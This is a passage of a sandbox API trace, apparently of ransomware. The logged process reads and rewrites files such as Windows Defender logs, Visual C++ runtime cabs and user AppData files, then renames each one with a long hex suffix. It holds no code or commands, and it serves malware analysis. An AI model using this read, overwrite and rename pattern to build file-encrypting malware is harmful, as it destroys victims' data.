(hObject=0x58c) returned 1 [0157.104] GetProcessHeap () returned 0x270000 [0157.128] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.136] RtlInterlockedCompareExchange64 () returned 0x1 [0157.136] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0157.148] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0157.149] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0157.149] WriteFile (in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0157.151] RtlInterlockedCompareExchange64 () returned 0x0 [0157.151] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0157.152] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0157.153] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat", lpString2=".07A4111402B38CC80D9FC871E4AD8F0CAC9169A02228583F0BF4719D518B4478" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat.07A4111402B38CC80D9FC871E4AD8F0CAC9169A02228583F0BF4719D518B4478") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat.07A4111402B38CC80D9FC871E4AD8F0CAC9169A02228583F0BF4719D518B4478" [0157.153] GetProcessHeap () returned 0x270000 [0157.153] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13a) returned 0x320270 [0157.154] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x723f8dc, FileInformation=0x320270, Length=0x13a, FileInformationClass=0xa) returned 0x0 [0157.155] CloseHandle (hObject=0x58c) returned 1 [0157.165] GetProcessHeap () returned 0x270000 [0157.166] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0157.166] RtlInterlockedCompareExchange64 () returned 0x1 [0157.167] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0157.403] ReadFile (in: hFile=0x58c, lpBuffer=0x7410188, nNumberOfBytesToRead=0x1600, lpNumberOfBytesRead=0x0, lpOverlapped=0x73f0050 | out: lpBuffer=0x7410188*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73f0050) returned 1 [0157.403] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0157.404] WriteFile (in: hFile=0x58c, lpBuffer=0x7410188*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73f0050 | out: lpBuffer=0x7410188*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73f0050) returned 1 [0157.407] RtlInterlockedCompareExchange64 () returned 0x0 [0157.407] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0157.408] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x73f0100, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x73f0100, ReturnLength=0x723f8ec) returned 0x0 [0157.409] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-215552.log", lpString2=".B131BA2315EE1194E58B123E2CABFC51D913354140362886F581C1CF30FE5F23" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-215552.log.B131BA2315EE1194E58B123E2CABFC51D913354140362886F581C1CF30FE5F23") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-215552.log.B131BA2315EE1194E58B123E2CABFC51D913354140362886F581C1CF30FE5F23" [0157.409] GetProcessHeap () returned 0x270000 [0157.409] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x154) returned 0x35ad68 [0157.409] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x723f8dc, FileInformation=0x35ad68, Length=0x154, FileInformationClass=0xa) returned 0x0 [0157.410] CloseHandle (hObject=0x58c) returned 1 [0157.415] GetProcessHeap () returned 0x270000 [0157.418] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.418] RtlInterlockedCompareExchange64 () returned 0x1 [0157.418] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0157.620] ReadFile (in: hFile=0x4a8, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0157.622] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0157.623] WriteFile (in: hFile=0x4a8, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0157.627] RtlInterlockedCompareExchange64 () returned 0x0 [0157.627] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0157.628] NtQueryObject (in: Handle=0x4a8, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0157.629] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab", lpString2=".4A70091801A5FAE53A764E3FFF873AF7E02A1AE8FD8D040ED2D63534408EA343" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab.4A70091801A5FAE53A764E3FFF873AF7E02A1AE8FD8D040ED2D63534408EA343") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab.4A70091801A5FAE53A764E3FFF873AF7E02A1AE8FD8D040ED2D63534408EA343" [0157.630] GetProcessHeap () returned 0x270000 [0157.630] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1b0) returned 0x42f01d0 [0157.630] NtSetInformationFile (FileHandle=0x4a8, IoStatusBlock=0x723f8dc, FileInformation=0x42f01d0, Length=0x1b0, FileInformationClass=0xa) returned 0x0 [0157.634] CloseHandle (hObject=0x4a8) returned 1 [0157.995] GetProcessHeap () returned 0x270000 [0157.996] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0157.996] RtlInterlockedCompareExchange64 () returned 0x1 [0157.996] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.025] ReadFile (in: hFile=0x5a0, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0158.025] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.026] WriteFile (in: hFile=0x5a0, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0158.028] RtlInterlockedCompareExchange64 () returned 0x0 [0158.028] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.029] NtQueryObject (in: Handle=0x5a0, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0158.030] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab", lpString2=".66316E8DEE6B799E6F373C35C8BB6CAE921B2F17336A572F4F2B2A499C2AE96B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.66316E8DEE6B799E6F373C35C8BB6CAE921B2F17336A572F4F2B2A499C2AE96B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.66316E8DEE6B799E6F373C35C8BB6CAE921B2F17336A572F4F2B2A499C2AE96B" [0158.030] GetProcessHeap () returned 0x270000 [0158.030] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a8) returned 0x4278bf0 [0158.030] NtSetInformationFile (FileHandle=0x5a0, IoStatusBlock=0x723f8dc, FileInformation=0x4278bf0, Length=0x1a8, FileInformationClass=0xa) returned 0x0 [0158.033] CloseHandle (hObject=0x5a0) returned 1 [0158.057] GetProcessHeap () returned 0x270000 [0158.060] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0158.060] RtlInterlockedCompareExchange64 () returned 0x1 [0158.060] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.095] ReadFile (in: hFile=0x4a8, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0158.095] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.096] WriteFile (in: hFile=0x4a8, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0158.099] RtlInterlockedCompareExchange64 () returned 0x0 [0158.099] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.099] NtQueryObject (in: Handle=0x4a8, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0158.101] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab", lpString2=".47816B003FB51FB3A3CAB1C7CE925A5BD830FC071AFC02CEF2DD91708583153D" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab.47816B003FB51FB3A3CAB1C7CE925A5BD830FC071AFC02CEF2DD91708583153D") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab.47816B003FB51FB3A3CAB1C7CE925A5BD830FC071AFC02CEF2DD91708583153D" [0158.101] GetProcessHeap () returned 0x270000 [0158.101] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1aa) returned 0x42f0388 [0158.101] NtSetInformationFile (FileHandle=0x4a8, IoStatusBlock=0x723f8dc, FileInformation=0x42f0388, Length=0x1aa, FileInformationClass=0xa) returned 0x0 [0158.105] CloseHandle (hObject=0x4a8) returned 1 [0158.183] GetProcessHeap () returned 0x270000 [0158.184] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0158.184] RtlInterlockedCompareExchange64 () returned 0x1 [0158.185] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.248] ReadFile (in: hFile=0x5a0, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0158.248] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.250] WriteFile (in: hFile=0x5a0, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0158.253] RtlInterlockedCompareExchange64 () returned 0x0 [0158.254] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.254] NtQueryObject (in: Handle=0x5a0, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0158.255] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab", lpString2=".AD797E1FB7628BCEAFE48C0018BDD379730C62A14342B8124ACBADE299C80958" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.AD797E1FB7628BCEAFE48C0018BDD379730C62A14342B8124ACBADE299C80958") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.AD797E1FB7628BCEAFE48C0018BDD379730C62A14342B8124ACBADE299C80958" [0158.256] GetProcessHeap () returned 0x270000 [0158.256] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1ae) returned 0x42f0540 [0158.256] NtSetInformationFile (FileHandle=0x5a0, IoStatusBlock=0x723f8dc, FileInformation=0x42f0540, Length=0x1ae, FileInformationClass=0xa) returned 0x0 [0158.259] CloseHandle (hObject=0x5a0) returned 1 [0158.680] GetProcessHeap () returned 0x270000 [0158.681] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0158.681] RtlInterlockedCompareExchange64 () returned 0x1 [0158.682] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.707] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0158.707] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.708] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0158.709] RtlInterlockedCompareExchange64 () returned 0x0 [0158.709] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.711] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0158.712] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab", lpString2=".AF81D3772EF0F0C94FCE5D2093D01FE8875B488FDE3B27CFF37113C9EDDF582A" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.AF81D3772EF0F0C94FCE5D2093D01FE8875B488FDE3B27CFF37113C9EDDF582A") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.AF81D3772EF0F0C94FCE5D2093D01FE8875B488FDE3B27CFF37113C9EDDF582A" [0158.712] GetProcessHeap () returned 0x270000 [0158.712] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1ae) returned 0x42f06f8 [0158.713] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x42f06f8, Length=0x1ae, FileInformationClass=0xa) returned 0x0 [0158.723] CloseHandle (hObject=0x598) returned 1 [0159.212] GetProcessHeap () returned 0x270000 [0159.213] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.213] RtlInterlockedCompareExchange64 () returned 0x1 [0159.213] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.215] WriteFile (in: hFile=0x58c, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0159.221] RtlInterlockedCompareExchange64 () returned 0x0 [0159.221] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.450] ReadFile (in: hFile=0x5a8, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x2e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0159.450] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.452] WriteFile (in: hFile=0x5a8, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x2e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0159.455] RtlInterlockedCompareExchange64 () returned 0x2 [0159.455] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.463] NtQueryObject (in: Handle=0x5a8, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0159.464] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak", lpString2=".C1F0B128345E024A6DB34C051BE9564C0AAECEBBB24CA75F7D2D961032DCED51" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak.C1F0B128345E024A6DB34C051BE9564C0AAECEBBB24CA75F7D2D961032DCED51") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak.C1F0B128345E024A6DB34C051BE9564C0AAECEBBB24CA75F7D2D961032DCED51" [0159.464] GetProcessHeap () returned 0x270000 [0159.464] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x150) returned 0x31e4c0 [0159.464] NtSetInformationFile (FileHandle=0x5a8, IoStatusBlock=0x723f8dc, FileInformation=0x31e4c0, Length=0x150, FileInformationClass=0xa) returned 0x0 [0159.465] CloseHandle (hObject=0x5a8) returned 1 [0159.469] GetProcessHeap () returned 0x270000 [0159.470] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.477] RtlInterlockedCompareExchange64 () returned 0x2 [0159.477] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.512] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0159.513] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml", lpString2=".B562F956152CE858C941E95CCD23716DE27D690F682268A7CEDA95FDDF971F0C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml.B562F956152CE858C941E95CCD23716DE27D690F682268A7CEDA95FDDF971F0C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml.B562F956152CE858C941E95CCD23716DE27D690F682268A7CEDA95FDDF971F0C" [0159.513] GetProcessHeap () returned 0x270000 [0159.513] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x168) returned 0x7420080 [0159.514] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x723f8dc, FileInformation=0x7420080, Length=0x168, FileInformationClass=0xa) returned 0x0 [0159.519] CloseHandle (hObject=0x58c) returned 1 [0159.522] GetProcessHeap () returned 0x270000 [0159.523] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.523] RtlInterlockedCompareExchange64 () returned 0x1 [0159.523] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: 